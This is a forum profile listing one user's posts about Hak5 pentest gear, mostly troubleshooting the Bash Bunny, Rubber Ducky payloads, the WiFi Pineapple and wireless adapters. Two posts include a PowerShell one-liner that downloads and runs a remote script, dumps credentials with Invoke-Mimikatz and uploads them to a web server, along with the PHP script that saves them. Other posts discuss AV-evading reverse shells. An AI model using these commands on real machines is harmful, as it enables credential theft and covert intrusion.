TeCHemically

Active Members
  • Posts

    131
Posts posted by TeCHemically

  1. On 11/19/2017 at 1:25 PM, kdodge said:

    It could be a lot of things, but you should start with checking if the file has write permissions to the server your running this on

    
    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
    if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
    ?>

    run tcpdump with this to see if it's not writable.

    Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));


    So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately, but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

  2. I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command as above:

    powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

    Here is the PHP script:

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
    ?>


    It was broken up like this before, but that didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference):

    <?php
    $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

    file_put_contents($file, file_get_contents("php://input"));
    ?>

    Thanks to any who reply!

  3. So, the duckhunter on NetHunter uses 2 different elements to inject strings. One being STRING, like normal, and the other being TEXT. When you use STRING, the LF at the end of your line is interpreted as an ENTER keystroke. If you just want to enter a string, then you need to use the TEXT element instead. I can see how this could make your scripts more efficient, but unless you know about this it just drives you crazy. Hope this helps someone!

  4. I am unable to use scripts that open CMD as admin because phantom ENTER lines are being executed after my "STRING cmd" lines in my ducky scripts. This is also happening in other places. I have a workaround to get an admin prompt, but it is of no use because these ENTER keystrokes are being entered in places where they should not be, and since they aren't actually in the script I cannot remove them. It may be that the end-of-line (EOL) character (LF in this case) is being interpreted as an ENTER keystroke. Is there any way to convert all EOL characters in a file from LF or CRLF to some kind of NULL character so the Duckhunter HID conversion tool won't add in these ENTER keystrokes? Thanks to all who reply. This has been driving me nuts!

  5. I have not had any success with my Bash Bunny since I bought it on the day it launched. Install tools has never worked, no matter what workarounds have been posted to try. The payloads don't execute properly, with the exception of a couple of ducky payloads that executed a few times with issues. Now even the ducky script payloads fail to respond. I get no lights at all when trying to run the install tools payload. I would like to speak with someone about a replacement. This device has never worked and it does not behave at all like the readme files state it should. I fought with it so long that I just set it down for a few months and picked it back up again today. Still, it's a whirlwind of fail. Please help me out here. I was so excited about this platform that I bought it on day one. I believe there is just some issue with the specific device I received. Any help and guidance is greatly appreciated!

  6. 20 hours ago, digip said:

    Yeah, if you got it on the hak shop, then it should be working. I know that the NEH model is hit or miss for some people, and they don't always have the actual same chipset, depending where you get them. It's one of the least fav cards by people.

    http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html

    Other than the card, what is your setup and what are you monitoring? If you have a home wifi router to test with, try connecting and disconnecting from it a few times with another device while in monitor mode and wireshark is going, or airodump. Make sure to start airodump on a specific channel, not to start it without a channel selected, can skew your chances of seeing anything connect. Monitoring a single channel at a time generally gets best results.

    I got airodump results on a different laptop. Do you know if the cards in the hakshop are NEH or NHA? If this won't work on my main rig then I'm going to have to return it. Shame too. It was a great price. I hope Darren isn't carrying the crap shoot card that contains inconsistent chipsets.

  7. 16 hours ago, digip said:

    Are you sure it's a compatible card? Find out what driver is loaded for it.

    https://www.aircrack-ng.org/doku.php?id=compatibility_drivers


    Post dmesg and any other output you may have when bringing it up and starting monitor mode. That should help others get an idea what is happening. If you have network manager running, I suggest killing it before trying any monitor mode stuff.

    By the way, if it's the "AWUS036NEH", that might be the one that is not compatible or have drivers, but I could be wrong. I've got a AWUS036NHA though. Mine works with monitor and injection, but can't do evil twin since it has only one antenna/input, and not mimo like some of the other cards.

    Thanks for the reply. I did kill network manager prior to use, and this is the card Darren is selling in the hakshop. It says it works out of the box. I'll post dmesg as soon as I can.

  8. I just got the RT3070 usb adapter and airodump isn't working on any OS. Tried 3 systems so far and every one of them shows all blank once the card is in mon mode and I start airodump. I ran check kill so nothing is interfering with it. What's the deal with this card? Any help is appreciated.

  9. On 5/4/2017 at 2:55 PM, RazerBlade said:

    Hello there! 

    I recently purchased my WiFi Pineapple after purchasing the Bash Bunny and the Rubber Ducky because the tools were excellent and well maintained. I thought it would be this great seamless experience with the pineapple as with the other Hak5 devices but I was wrong. To begin with, the device and its software is filled with bugs and the latest release was about 7 months ago! Of course the bugs may not break the device completely but it adds to a bad user experience where you realize you can't use an sdcard to install modules because of a kernel bug. Numerous bugs I have encountered are random shutdowns, recon stuck at 100%, pineap not starting or stopping, and this is also present in many modules. This makes the device in a way useless, because when you want to try to use it the bugs are always ruining the attack. Most of the bugs I have encountered are on the bug tracker list and an ETA from Hak5 for when the next firmware release would be is highly appreciated! The problems may be hardware based but because they are already on the bug tracker list, I doubt it.

    I have to agree that the vast majority of the time I have spent with my pineapples has been in troubleshooting, factory resetting, re-flashing, etc. The tool has great promise, but has never been stable for me in any true long term or feasible "deployment" sense. It has been fun to play with, while I'm not screaming at it for bugs I am fighting with, but I have never gotten any iteration to function in a consistent and stable way... and my first pineapple was a Fon I built myself. So, I'm not talking about a passing fancy here. I've been involved with these things all the way up to the Mark V. Given my issues, and the fact that support for older models drops off very quickly, I just can't justify purchasing either of the newer models. Sad :(

    • Upvote 2
  10. Found this, so I am factory resetting now. Hopefully this solves the issue. If anyone knows what is going on please do reply:

    You can use the DIP switches to perform a factory reset but it sounds like you may be using the wrong switches or not using the correct procedure. Try this:

    NOTE: With the switches facing you, they are ordered 1 - 5 from left to right.

    1) Power off your Pineapple.

    2) Place your DIP switches in the following sequence:

    Switch 1 - UP

    Switch 2 - DOWN

    Switch 3 - DOWN

    Switch 4 - UP

    Switch 5 - UP

    3) Power on your Pineapple

    4) Wait 5 minutes just to be safe and power off again

    5) Place all of your switches back in the up position again and power on.

    You should be good to go. Just connect via ethernet or Wifi, login to the web interface, and create a new password.

  11. I am unable to SCP or SSH to the mark V. Getting "permission denied" error for both. This has been constant prior to today; however, today when minimizing infusions they will no longer maximize again and I cannot factory reset or even properly reboot the device. So I need to be able to reflash it over SSH. Any ideas? Am I overlooking something here? Using port 22 for both.

  12. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them, so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can I restore the infusions so they are accessible?

  13. Mode G appeared successful, but I was never able to get connected via screen to verify the bunny could get out. I am on an Ubuntu based distro. I tried ECM and RNDIS. RNDIS listed as ttyACM0 for a time, but now it won't list as a tty at all whether ECM or RNDIS. Even after reboots. It just seems absent for some reason, although it shows the eth1 in ifconfig.

  14. My Bash Bunny does not show a device in Win7 and the devmgr shows under "other devices" an "RNDIS" entry with the yellow exclamation symbol indicating driver failure. Trying to point it to the bunny as suggested for the similar problem with CDC Serial driver issues does not help. I followed the steps here as far as I could: http://wiki.bashbunny.com/?_escaped_fragment_=././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows#!././index.md%23Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows

    I've not had any success installing tools, connecting to the internet, or anything else so far. It's been a pretty big let down for a first day. Any guidance is appreciated!

  15. I have set up and confirmed the functionality of this payload via tcpdump, but the Invoke-Mimikatz payload's "rx.php" fails to create .creds files. Confirmed appropriate permissions on the PHP script for www-data. Still nothing is created and no creds are captured. I can see them get sent to the server via packet capture, but if that's not running I don't ever see the creds files the rx.php script is supposed to create.

  16. Has anyone gotten the PoisonTap to work successfully? It appears to function properly when looking at tcpdump on the target, but I never get anything reaching out to the nodejs control server. Also, how does one interact with the nodejs server? Navigating to the server's interface:port gives a "sorry unknown url" error.

  17. Ettercap and sslstrip will not install on my MK5. Notifications say they install successfully, but when I go back to the infusion list it says they need to be updated again. I have tried removing and rebooting but no love. Still does the same thing on these 2 infusions.

  18. This script is now failing in Kali. I have tried on 2 separate installs that are up to date and get the following error:

    [*] Generating shellcode
    No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    No Arch selected, selecting Arch: x86 from the payload
    Found 0 compatible encoders
    reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError)
    from reverse_powershell_ducky.rb:51:in `clean_shellcode'
    from reverse_powershell_ducky.rb:45:in `shellcode_gen'
    from reverse_powershell_ducky.rb:90:in `<main>'

    Any help is greatly appreciated, as this is my go-to method in testing due to its AV evasion ability.

    Also, would it be possible to have this script accept domain names as well as IP addresses?
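The ArgumentError in the trace above is Ruby's String#gsub refusing to scan a string that is tagged UTF-8 but contains bytes that are not valid UTF-8, which is what raw msfvenom output looks like once it is read as text. The following is an added illustration, not the reverse_powershell_ducky.rb script from the thread: it reproduces the failure on a constructed byte buffer and shows the fix of re-tagging the buffer as binary with String#b before any gsub. The whitespace-stripping pattern is an assumption, since the script's own substitution is not shown on the page.

```ruby
# Added illustration, not reverse_powershell_ducky.rb itself.

# Constructed sample: a few raw payload bytes with line breaks mixed in,
# tagged UTF-8 the way text read from a pipe or file normally is.
# 0xFC and 0xE8 cannot begin a valid UTF-8 sequence.
RAW = "\xFC\xE8\x82\x00\n\x60\x89\n".dup.force_encoding(Encoding::UTF_8)

# Mirrors the failing pattern: gsub on a UTF-8-tagged string whose bytes are
# not valid UTF-8 raises ArgumentError ("invalid byte sequence in UTF-8").
def clean_shellcode_buggy(shellcode)
  shellcode.gsub(/\s+/, "")
end

# Fix: String#b returns a copy tagged ASCII-8BIT, so gsub works byte-wise and
# never tries to decode the buffer as characters. (Stripping whitespace is an
# assumption; the thread does not show what the real script substitutes.)
def clean_shellcode_fixed(shellcode)
  shellcode.b.gsub(/\s+/, "")
end

# Hex rendering of the cleaned bytes, the form a script that builds a text
# payload from them would need.
def to_hex(shellcode)
  clean_shellcode_fixed(shellcode).unpack1("H*")
end

# Returns the error message the buggy version produces, or :no_error.
def buggy_result(shellcode)
  clean_shellcode_buggy(shellcode)
  :no_error
rescue ArgumentError => e
  e.message
end

if $PROGRAM_NAME == __FILE__
  puts "buggy: #{buggy_result(RAW)}"
  puts "fixed: #{to_hex(RAW)}"
end
```

The same re-tagging applies wherever the buffer enters the script: reading msfvenom's stdout in binary mode, or calling `.b` on it before the first gsub, avoids the error without touching the bytes.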

  19. Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that, the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

    ~skysploit

    WOW, just... WOW man... the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D
